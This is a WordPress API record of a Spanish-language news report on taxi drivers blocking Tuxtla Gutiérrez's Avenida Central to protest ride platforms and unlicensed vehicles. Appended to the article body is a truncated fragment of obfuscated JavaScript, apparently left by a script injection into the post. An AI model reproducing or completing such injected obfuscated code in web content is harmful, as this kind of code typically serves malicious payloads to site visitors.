{"id":25558,"date":"2025-12-02T02:05:28","date_gmt":"2025-12-02T02:05:28","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=25558"},"modified":"2025-12-02T02:05:29","modified_gmt":"2025-12-02T02:05:29","slug":"taxistas-bloquean-avenida-principal-de-tuxtla-en-protesta-contra-plataformas-y-unidades-piratas","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=25558","title":{"rendered":"Taxistas bloquean avenida principal de Tuxtla en protesta contra plataformas y unidades piratas"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/12\/1000468711-1024x768.jpg\" alt=\"\" class=\"wp-image-25559\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/12\/1000468711-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/12\/1000468711-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/12\/1000468711-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/12\/1000468711-1536x1152.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/12\/1000468711-2048x1536.jpg 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Manuel Jim\u00e9nez.<\/p>\n\n\n\n<p>1 de diciembre del 2025. \u2014 La ma\u00f1ana de este lunes, integrantes del Sindicato de Taxistas Fidel Vel\u00e1zquez cerraron el tr\u00e1nsito en la Avenida Central de la capital chiapaneca como medida de presi\u00f3n, exigiendo a las autoridades intervenir ante lo que califican como \u201ccompetencia desleal y desregulada\u201d por parte de plataformas de transporte privado.<\/p>\n\n\n\n<p>Julio Montero, representante del gremio, declar\u00f3 que la protesta busca obligar a los tres niveles de gobierno a implementar operativos permanentes contra estos servicios que, seg\u00fan afirm\u00f3, operan sin permisos, concesiones ni regulaci\u00f3n alguna, afectando econ\u00f3micamente a miles de taxistas concesionados.<\/p>\n\n\n\n<p>\u201cLa situaci\u00f3n es insostenible. Estimamos que circulan en la ciudad m\u00e1s de 18 mil veh\u00edculos piratas que no pagan impuestos, no tienen seguro para pasajeros ni pasan revisiones t\u00e9cnicas obligatorias. Esto est\u00e1 acabando con nuestro sustento\u201d, denunci\u00f3 Montero frente a manifestantes que portaban pancartas con lemas como \u201c\u00a1Exigimos aplicaci\u00f3n de la ley!\u201d y \u201cNo a la pirater\u00eda en el transporte\u201d.<\/p>\n\n\n\n<p>Los taxistas advirtieron que mantendr\u00e1n las movilizaciones de manera indefinida hasta que la Secretar\u00eda de Movilidad y la Polic\u00eda Estatal presenten un plan de acci\u00f3n concreto y verificable para regular el servicio de transporte privado.<\/p>\n\n\n\n<p>El bloqueo en una de las v\u00edas m\u00e1s importantes de Tuxtla Guti\u00e9rrez provoc\u00f3 caos vial durante varias horas, afectando a cientos de automovilistas y usuarios del transporte p\u00fablico que vieron interrumpidos sus trayectos.<\/p>\n\n\n\n<p>Este conflicto entre el taxi tradicional y las nuevas modalidades de transporte se ha replicado en varias ciudades del pa\u00eds, sin que hasta el momento las autoridades hayan logrado una soluci\u00f3n integral que equilibre la innovaci\u00f3n en movilidad con la protecci\u00f3n del empleo y la seguridad de los usuarios.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Manuel Jim\u00e9nez. 1 de diciembre del 2025. \u2014 La ma\u00f1ana de este lunes, integrantes del Sindicato de Taxistas Fidel Vel\u00e1zquez cerraron el tr\u00e1nsito en la Avenida Central de la capital chiapaneca como medida de presi\u00f3n, exigiendo a las autoridades intervenir ante lo que califican como \u201ccompetencia desleal y desregulada\u201d por parte de plataformas de transporte &hellip;<\/p>\n","protected":false},"author":2,"featured_media":25559,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-25558","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/25558","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=25558"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/25558\/revisions"}],"predecessor-version":[{"id":25560,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/25558\/revisions\/25560"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/25559"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=25558"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=25558"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=25558"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}